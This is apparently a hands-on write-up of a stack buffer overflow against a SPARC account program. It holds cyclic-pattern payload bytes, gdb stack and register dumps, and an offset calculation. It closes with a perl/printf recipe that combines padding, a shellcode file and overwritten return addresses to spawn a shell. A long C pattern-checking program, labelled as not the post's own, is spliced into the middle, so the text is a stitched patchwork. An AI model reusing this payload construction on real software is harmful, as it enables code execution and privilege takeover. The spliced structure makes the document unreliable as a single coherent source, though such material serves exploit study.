"\x0b\x53\x53\x53\x0b\x54\x54\x54\x0b\x55\x55\x55\x0b\x56\x56\x56"
"\x0b\x57\x57\x57\x0b\x58\x58\x58\x0b\x59\x59\x59\x0b\x5a\x5a\x5a"
"\x0c\x41\x41\x41\x0c\x42\x42\x42\x0c\x43\x43\x43\x0c\x44\x44\x44"
"\x0c\x45\x45\x45\x0c\x46\x46\x46\x0c\x47\x47\x47\x0c\x48\x48\x48"
"\x0c\x49\x49\x49\x0c\x4a\x4a\x4a\x0c\x4b\x4b\x4b\x0c\x4c\x4c\x4c"
"\x0c\x4d\x4d\x4d\x0c\x4e\x4e\x4e\x0c\x4f\x4f\x4f\x0c\x50\x50\x50"
"\x0c\x51\x51\x51\x0c\x52\x52\x52\x0c\x53\x53\x53\x0c\x54\x54\x54"
"\x0c\x55\x55\x55\x0c\x56\x56\x56\x0c\x57\x57\x57\x0c\x58\x58\x58"
"\x0c\x59\x59\x59\x0c\x5a\x5a\x5a\x0d\x41\x41\x41\x0d\x42\x42\x42"
"\x0d\x43\x43\x43\x0d\x44\x44\x44\x0d\x45\x45\x45\x0d\x46\x46\x46"
"\x0d\x47\x47\x47\x0d\x48\x48\x48\x0d\x49\x49\x49\x0d\x4a\x4a\x4a"
"\x0d\x4b\x4b\x4b\x0d\x4c\x4c\x4c\x0d\x4d\x4d\x4d\x0d\x4e\x4e\x4e"
"\x0d\x4f\x4f\x4f\x0d\x50\x50\x50\x0d\x51\x51\x51\x0d\x52\x52\x52"
"\x0d\x53\x53\x53\x0d\x54\x54\x54\x0d\x55\x55\x55\x0d\x56\x56\x56"
"\x0d\x57\x57\x57\x0d\x58\x58\x58\x0d\x59\x59\x59\x0d\x5a\x5a\x5a"
"\x0e\x41\x41\x41\x0e\x42\x42\x42\x0e\x43\x43\x43\x0e\x44\x44\x44"
"\x0e\x45\x45\x45\x0e\x46\x46\x46\x0e\x47\x47\x47\x0e\x48\x48\x48"
"\x0e\x49\x49\x49\x0e\x4a\x4a\x4a\x0e\x4b\x4b\x4b\x0e\x4c\x4c\x4c"
"\x0e\x4d\x4d\x4d\x0e\x4e\x4e\x4e\x0e\x4f\x4f\x4f\x0e\x50\x50\x50"
"\x0e\x51\x51\x51\x0e\x52\x52\x52\x0e\x53\x53\x53\x0e\x54\x54\x54"
"\x0e\x55\x55\x55\x0e\x56\x56\x56\x0e\x57\x57\x57\x0e\x58\x58\x58"
"\x0e\x59\x59\x59\x0e\x5a\x5a\x5a\x0f\x41\x41\x41\x0f\x42\x42\x42"
"\x0f\x43\x43\x43\x0f\x44\x44\x44\x0f\x45\x45\x45\x0f\x46\x46\x46"
"\x0f\x47\x47\x47\x0f\x48\x48\x48\x0f\x49\x49\x49\x0f\x4a\x4a\x4a"
"\x0f\x4b\x4b\x4b\x0f\x4c\x4c\x4c\x0f\x4d\x4d\x4d\x0f\x4e\x4e\x4e"
"\x0f\x4f\x4f\x4f\x0f\x50\x50\x50\x0f\x51\x51\x51\x0f\x52\x52\x52"
"\x0f\x53\x53\x53\x0f\x54\x54\x54\x0f\x55\x55\x55\x0f\x56\x56\x56"
"\x0f\x57\x57\x57\x0f\x58\x58\x58\x0f\x59\x59\x59\x0f\x5a\x5a\x5a"
"\x10\x41\x41\x41\x10\x42\x42\x42\x10\x43\x43\x43\x10\x44\x44\x44"
"\x10\x45\x45\x45\x10\x46\x46\x46\x10\x47\x47\x47\x10\x48\x48\x48"
"\x10\x49\x49\x49\x10\x4a\x4a\x4a\x10\x4b\x4b\x4b\x10\x4c\x4c\x4c"
"\x10\x4d\x4d\x4d\x10\x4e\x4e\x4e\x10\x4f\x4f\x4f\x10\x50\x50\x50"
"\x10\x51\x51\x51\x10\x52\x52\x52\x10\x53\x53\x53\x10\x54\x54\x54"
"\x10\x55\x55\x55\x10\x56\x56\x56\x10\x57\x57\x57\x10\x58\x58\x58"
"\x10\x59\x59\x59\x10\x5a\x5a\x5a\x11\x41\x41\x41\x11\x42\x42\x42"
"\x11\x43\x43\x43\x11\x44\x44\x44\x11\x45\x45\x45\x11\x46\x46\x46"
"\x11\x47\x47\x47\x11\x48\x48\x48\x11\x49\x49\x49\x11\x4a\x4a\x4a"
Breakpoint 1, 0x00012b28 in askyorn ()
(gdb) $ unknown mode: cooked
$ stty
nknown mode:
$ stty cooked
$
$ exit
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e014141      0x41014242      0x42014343      0x43014444

One of the first things I notice: the buffer start is not word-aligned; it's off by 3. This is because of the 'n' that must be present at offset 0. To account for this, we should write 4 'n' characters to get back onto a word boundary.

Here we can see the stack after re-aligning to the word boundary, with 'nnnn' + payload:

0xffbef930:     0x6e6e6e6e      0x01414141      0x01424242      0x01434343
0xffbef940:     0x01444444      0x01454545      0x01464646      0x01474747
0xffbef950:     0x01484848      0x01494949      0x014a4a4a      0x014b4b4b
0xffbef960:     0x014c4c4c      0x014d4d4d      0x014e4e4e      0x014f4f4f
0xffbef970:     0x01505050      0x01515151      0x01525252      0x01535353
0xffbef980:     0x01545454      0x01555555      0x01565656      0x01575757
0xffbef990:     0x01585858      0x01595959      0x015a5a5a      0x02414141
0xffbef9a0:     0x02424242      0x02434343      0x02444444      0x02454545
0xffbef9b0:     0x02464646      0x02474747      0x02484848      0x02494949
0xffbef9c0:     0x024a4a4a      0x024b4b4b      0x024c4c4c      0x024d4d4d
0xffbef9d0:     0x024e4e4e      0x024f4f4f      0x02505050      0x02515151
0xffbef9e0:     0x02525252      0x02535353      0x02545454      0x02555555

Continuing:

(gdb) x/4i $pc
0x12b28 <askyorn+248>:  ret
0x12b2c <askyorn+252>:  restore
0x12b30 <mkpasswd>:     save  %sp, -136, %sp
0x12b34 <mkpasswd+4>:   st  %i0, [ %fp + 0x44 ]
(gdb) si
0x00012b2c in askyorn ()
(gdb) 0x00011638 in Acct ()
(gdb) 0x0001163c in Acct ()
(gdb) $ $
$ exit
(gdb) x/96x $sp
0xffbefd40:     0x0b5a5a5a      0x0c414141      0x0c424242      0x0c434343
0xffbefd50:     0x0c444444      0x0c454545      0x0c464646      0x0c474747
0xffbefd60:     0x0c484848      0x0c494949      0x0c4a4a4a      0x0c4b4b4b
0xffbefd70:     0x0c4c4c4c      0x0c4d4d4d      0x0c4e4e4e      0x0c4f4f4f
0xffbefd80:     0x0c505050      0x0c515151      0x0c525252      0x0c535353
0xffbefd90:     0x0c545454      0x0c555555      0x0c565656      0x0c575757
0xffbefda0:     0x0c585858      0x0c595959      0x0c5a5a5a      0x0d414141
0xffbefdb0:     0x0d424242      0x0d434343      0x0d444444      0x0d454545
0xffbefdc0:     0x0d464646      0x0d474747      0x0d484848      0x0d494949
0xffbefdd0:     0x0d4a4a4a      0x0d4b4b4b      0x0d4c4c4c      0x0d4d4d4d
0xffbefde0:     0x0d4e4e4e      0x0d4f4f4f      0x0d505050      0x0d515151
0xffbefdf0:     0x0d525252      0x0d535353      0x0d545454      0x0d555555
0xffbefe00:     0x0d565656      0x0d575757      0x0d585858      0x0d595959
0xffbefe10:     0x0d5a5a5a      0x0e414141      0x0e424242      0x0e434343
0xffbefe20:     0x0e444444      0x0e454545      0x0e464646      0x0e474747
0xffbefe30:     0x0e484848      0x0e494949      0x0e4a4a4a      0x0e4b4b4b
0xffbefe40:     0x0e4c4c4c      0x0e4d4d4d      0x0e4e4e4e      0x0e4f4f4f
0xffbefe50:     0x0e505050      0x0e515151      0x0e525252      0x0e535353
0xffbefe60:     0x0e545454      0x0e555555      0x0e565656      0x0e575757

fp             0xc4e4e4e        0xc4e4e4e
i7             0xc4f4f4f        206524239

Now we use my program to get the smash offset. Of course it has to take into account the missing 0x0a prefix, hence the -g option:

bazz@life[pts/2][~/latest] ./alternating_payload3 -g 0x0c4e4e4e
-g detected, assuming interactive targetnumbytes = 206458446
1092

1092 + ‘nnnn’ = 1096
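As an added example, not the post's own tool, here is a self-contained C check of the same pattern scheme covering the -g generator, the skipped 0x0a prefix, the offset formula and the word-alignment observation above. It regenerates the [prefix][letter][letter][letter] payload with 0x0a never used as a prefix, recomputes the offset with the closed-form formula from the program ([(msb - 1) * 26 + (lsb - 0x41)] * 4, with the 0x0a adjustment), and also finds the offset by searching the generated bytes, which works at any byte alignment and therefore reports the misalignment seen in the first stack dump directly. The function names (gen_pattern, offset_formula, offset_search, has_byte) are my own; the target byte order is assumed big-endian, as on the SPARC box in the transcripts, and the sample values 0x0c4e4e4e and 0x41014242 are taken from the dumps above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LETTERS 26   /* entries per prefix byte: 'A'..'Z' */

/* Fill out[0..n) with 4-byte entries [prefix][letter][letter][letter].
 * The prefix runs 0x01, 0x02, ... (never 0x00); with skip_nl set, 0x0a is
 * also never used, because a gets()-style reader stops at a newline.
 * Entries are emitted whole, so n is rounded down to a multiple of 4.
 * Returns the number of bytes written. */
size_t gen_pattern(unsigned char *out, size_t n, int skip_nl)
{
    unsigned char prefix = 0x01, letter = 'A';
    size_t written = 0;

    while (written + 4 <= n) {
        out[written++] = prefix;
        out[written++] = letter;
        out[written++] = letter;
        out[written++] = letter;
        if (++letter > 'Z') {
            letter = 'A';
            prefix++;
            if (prefix == 0x00)
                prefix = 0x01;
            if (skip_nl && prefix == 0x0a)
                prefix++;
        }
    }
    return written;
}

/* Closed-form lookup: [(msb - 1) * 26 + (lsb - 'A')] * 4, with prefixes
 * above the skipped 0x0a pulled back one group. Returns -1 when v is not a
 * well-formed entry (zero prefix, letter outside 'A'..'Z', unequal letter
 * bytes, or a 0x0a prefix that the skip_nl generator never emits). */
long offset_formula(uint32_t v, int skip_nl)
{
    unsigned msb = (v >> 24) & 0xff;
    unsigned b2 = (v >> 16) & 0xff, b1 = (v >> 8) & 0xff, lsb = v & 0xff;

    if (msb == 0 || lsb < 'A' || lsb > 'Z' || b2 != lsb || b1 != lsb)
        return -1;
    if (skip_nl && msb == 0x0a)
        return -1;
    msb -= 1;
    if (skip_nl && msb >= 0x0a)   /* 0x0b became group 9, 0x0c group 10, ... */
        msb -= 1;
    return (long)((msb * LETTERS + (lsb - 'A')) * 4);
}

/* General lookup: scan the generated bytes for the smashed word at any byte
 * alignment. big_endian gives the order in which the CPU stored the word
 * (SPARC is big-endian). Returns the byte offset, or -1 if not found. */
long offset_search(const unsigned char *pat, size_t n, uint32_t v, int big_endian)
{
    unsigned char needle[4];
    size_t i;

    for (i = 0; i < 4; i++) {
        int shift = big_endian ? 24 - 8 * (int)i : 8 * (int)i;
        needle[i] = (unsigned char)((v >> shift) & 0xff);
    }
    for (i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* True if byte b occurs anywhere in pat[0..n). */
int has_byte(const unsigned char *pat, size_t n, unsigned char b)
{
    return memchr(pat, b, n) != NULL;
}

int main(void)
{
    static unsigned char pat[1600];
    size_t n = gen_pattern(pat, sizeof pat, 1);

    printf("%zu bytes generated, contains 0x0a: %d\n", n, has_byte(pat, n, 0x0a));
    printf("0x0c4e4e4e -> formula %ld, search %ld\n",
           offset_formula(0x0c4e4e4e, 1), offset_search(pat, n, 0x0c4e4e4e, 1));
    printf("0x41014242 -> search %ld (pattern shifted by that many bytes)\n",
           offset_search(pat, n, 0x41014242, 1));
    return 0;
}
```

For 0x0c4e4e4e both lookups give 1092, matching the tool's output above; the formula and the search agree for every aligned entry, including 0x0b414141 at 936, which is where the 0x0a group would have started without -g. The word 0x41014242 from the first dump is found at byte 3 of the pattern, which is the off-by-3 alignment noticed above without having to read it off the dump by eye. For a little-endian target pass 0 as big_endian so the needle is built in the order the CPU stored it.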

# asmshell5_interactive.bin is 84 bytes
perl -e 'print "nnnnnnnn";'
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 - 92 = 1004
perl -e 'print "A"x1004'
printf "\xff\xbe\xfe\x68"
printf "\xff\xbe\xf9\x30" # code will start at 0xffbef938
# return address goes here

1096 bytes to get to the %fp, plus 8 bytes to write fp and i7 = total 1104 bytes
